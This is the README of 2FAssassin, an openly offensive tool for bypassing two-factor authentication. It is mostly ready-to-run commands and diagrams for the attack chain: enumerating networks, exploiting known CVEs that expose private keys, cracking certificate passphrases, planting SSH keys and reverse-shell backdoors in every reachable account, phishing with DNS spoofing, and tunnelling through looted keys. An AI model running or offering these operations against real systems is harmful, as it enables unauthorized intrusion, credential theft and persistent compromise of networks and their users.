maxwellkoh / 2fassassin
Programming Languages
Preamble
- Code changes from time to time, please do a 'git pull' before running the tool.
Intro
- The effectiveness of the Two-Factor-Authentication depends on how well a user protects "something only the user has".
- The tool looks out for getting the OTP(s) and private keys using various methods.
- The private keys can be extracted from client certificates and cracked to be used for authentication.
- The tool exploits the common vulnerabilities that caused private keys leakage.
- Propagates the compromise starting from a single machine to the entire networks via looted private keys.
Features
[email protected]:~/2fassassin# python assassin.py -h
|_ ) /\ ______ __ _ _____()_ _ / /| / _ \ (-<-</ ` (-<-< | ' +v2 /|// _///_,///||||
usage: assassin.py [-h] [--target TARGET] [--silent] [--scan SCAN] [--check CHECK] [--cert CERT] [--filetype FILETYPE] [--user USER] [--user2 USER2] [--secret SECRET] [--spoof SPOOF] [--gateway GATEWAY] [--mitm MITM] [--host HOST] [--mode MODE] [--auto AUTO] [--post POST] [--db DB] [--key KEY] [--log LOG] [--tunnel TUNNEL] [--chain CHAIN]
Bypass 2FA - SMS, Voice, SSH
optional arguments: -h, --help show this help message and exit --target TARGET IP Address --silent reduce output verbosity --scan SCAN Network enumeration { basic | advanced } --check CHECK Check for vulnerabilities, modules --cert CERT Certificate management --filetype FILETYPE Specify file *.extension --user USER username --user2 USER2 username2 --secret SECRET password --spoof SPOOF spoof --gateway GATEWAY gateway --mitm MITM mitm --host HOST server ip --mode MODE mode --auto AUTO auto mode for automation --post POST post modules --db DB Manage your trophies. --key KEY keys management --log LOG View logs --tunnel TUNNEL Create ssh tunnel with looted private keys --chain CHAIN The amount of connecting chain
Example Usage
- Network enumeration:
./assassin.py --scan <basic | advanced> --target <ip_address | range> ./assassin.py --scan advanced --target 192.168.0.0/24 ./assassin.py --scan basic --target 192.168.2.40
AUTOMATIC MODE
-
Check everythings (common vulnerabilities) that cause the private keys to leak out. ./assassin.py --check auto --mode attack
Network Enumeration + | Building Target Database | v
+----------------------------------------------------------------------------+ |SSH-based Attacks | |ShellShock | |HeartBleed | |Ceragon FibeAir IP-10 SSH Private Key Exposure | |ExaGrid Known SSH Key and Default Password | |F5 BIG-IP SSH Private Key Exposure | |Loadbalancer.org Enterprise VA SSH Private Key | |Array Networks vAPV and vxAG Private Key Privilege Escalation Code Execution| |Quantum DXi V1000 SSH Private Key Exposure | +-------------------------------------+--------------------------------------+ | | POST Modules v Keys Extraction + | Looted Keys | v Key-based Authentication
Manual MODE
-
SSH-based Attacks to get private keys ./assassin.py --check ssh --mode attack
-
HeartBleed Attacks to get private keys:
./assasin.py --check heartbleed --mode attack -
Ceragon FibeAir IP-10 SSH Private Key Exposure: CVE-2015-0936 ./assassin.py --check ceragon --mode attack
-
ExaGrid Known SSH Key and Default Password : CVE-2016-1560 ./assassin.py --check exagrid --mode attack
-
F5 BIG-IP SSH Private Key Exposure: CVE-2012-1493 ./assassin.py --check f5 --mode attack
-
Loadbalancer.org Enterprise VA SSH Private Key ./assassin.py --check loadbalancer --mode attack
-
Array Networks vAPV and vxAG Private Key Privilege Escalation Code Execution ./assassin.py --check array --mode attack
-
Quantum DXi V1000 SSH Private Key Exposure ./assassin.py --check quantum --mode attack
-
Check & disable Two-Factor Authentication ./assassin.py --check config --mode attack
POST MODE
- Once you looted the private keys, perform key-based authentication to all targets in the database ./assassin.py --check ssh --mode auth
Certificate Handling
#4
Remove Passphrase <---------------------------+
+ |
| |
| #3 |
| Parsing Cracked Passphase |
| |
Analyze Certificate | |
+ v |
| |
| +---------------------------+ |
| | | +
#1 +----------> | ^^^^^^^^^^^^^^^^^^^^^ | <---------+ Getting Passphrase
| PKCS#12 Certificate | { Cracking | Stealing }
| ^^^^^^^^^^^^^^^^^^^^^ | #2
| |
+----------+-----+----------+
| | keep for later use <--------+
| | :) |
| | |
| | |
#5 | | #6 |
Extract Public Key <----------------+ +--------------------> Extract Private Key+
+
|
v #10
Validate Domain #7 Authenticate to SSL Server <-------+
+ |
| |
v #9 |
Real Domain Hunting +----------------> Prepare Client Machine +--------------------+
#8 +----------------------------+ SSL/HTTPS
| Loading Client|Certificate |
+----------------------------+
-
Look for potential certificate files (contains private keys inside!!!) ./assassin.py --cert analyze --filetype pfx
-
Cracking PKCS#12 Passphrases: {Dictionary Attacks -- using wordlist} ./assassin.py --cert crack --mode dic --filetype pfx
{Pure Brute Force + Mutation} ./assassin.py --cert crack --mode bruteforce --filetype pfx
-
Dissect the certificate file + removing the passphrases + hunting for correct domain (target server) ./assassin.py --cert dissect --filetype pfx
-
Preparing client machine + install cracked certificate + authenticate to SSL server ./assassin.py --cert windows --user --secret --host <client_machine_ip>
#2 Loads client-certificate +-----------------+ +----------------+ +------------------+ | Attacker Machine| | Windows Client | | SSL Website | | (2FAssassin) +---------> |(172.16.173.180)+-----------------> | (172.16.173.182) | +-----------------+ +----------------+ +------------------+
Sends client-certificate, instruction script Authenticates to remote SSL website #1 #3
Backdoor
#4 {add keys}
'2fassassin' +---------> account_1
#1 +-----------+ |
+-------------> |create user| +---------> account_2
| #2 +--------------------+ |
sshkey +-------------> |generate RSA keypair| +---------> account_3 | #3 +------------------------+ | +-------------> |access to remote server| -------+---------> account_4 +------------------------+ | +---------> account_5 | +---------> .........
-
Add arbitrary SSH keys to all the accessible accounts ./assassin.py --check sshkey --mode attack
-
Drop persistent backdoor (reverse shell) to all the accessible accounts ./assassin.py --check reverse --mode attack
Impersonation / Client Side Attacks
#1
Server certificate was stolen by attacker
+------------+ | Attacker | <-----------------------------------------------------------+ |(2FAssassin)| | +----+--+----+ | | ^ | | | #7 | | | reverse shell | | | connects back | | | to attacker | | | | | | +----------------+ (normal) +---------+--------+ | | | Windows Client | client auth | SSL Website | | +-------------------+(172.16.173.180)+-----------------> | (172.16.173.182) | | +----------+-+---+ +------------------+ | ^ | | #4 | | | SSL webiste is now | | | at 172.16.173.194 | +-------------------------------+ #6 | | | client download | | #5 | malware from the | #3 +-----+-----------+ (abnormal) | phishing website | DNS Spoofing | | client auth | +-------------------------> | DNS Server | | | |(172.16.173.191) | | | | | | | +-----------------+ | | | | +------------------+ +----------------------------------------------------------> | Phishing Website | #2 Attacker cracked the server certificate, then use it | (172.16.173.194) | to set up phishing website +------------------+
- Setup phishing website + DNS Spoofing Attacks ./assassin.py --filetype pfx --spoof <phishing_server_ip> --user --secret --target <victim_ip> --gateway <dns_ip> --mitm <on|off>
Tunnelling
- Create ssh tunnel using looted private keys (greater the chain value, longer the ssh tunnel) ./assassin.py --tunnel ssh --chain 1 --user --secret password --user2 --host <server_ip> ./assassin.py --tunnel ssh --chain 2 --user --secret password --user2 --host <server_ip> --user3 --host2 <server_ip2> ./assassin.py --tunnel ssh --chain 3 --user --secret password --user2 --host <server_ip> --user3 --host2 <server_ip2> --user4 --host3 <server_ip3>
Administration
-
View activity output:
./assassin.py --log all -
See what (e.g., credentials) you've got:
./assassin.py --log loot -
Find out the origin of the SSH user: ./assassin.py --log whereis --user
-
Find out what SSH accounts are remotely accessible: ./assassin.py --log account --host <target_host>
Investigation
-
Check if a remote host using key-based authentication ./assassin.py --check pka --mode detect
-
Find out which machine hosting the user account ./assassin.py --log whereis --user
-
Find out what accounts can potentially be accessed by a specific user ./assassin.py --log account --host <ip_address>
FAQ
-
Error when launching network enumeration Try loading the msgprc at msfconsole, and define the password (e.g., load msgrpc Pass=abc123)
-
The user "2fassassin" not found when "./assassin.py --check sshkey --mode attack" Try create the user manually: useradd --force-badname 2fassassin su 2fassassin cd $home ssh-keygen -t rsa
Limitations
- Development Status :: 2 - Pre-Alpha
- Currently still under active development.
Copyright
2FAssassin - Created and maintained by Maxwell Koh
This program is free software: you can redistribute it and/
or modify it under the terms of the GNU General Public License as published by the Free Software Foundation,
either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see http://www.gnu.org/licenses/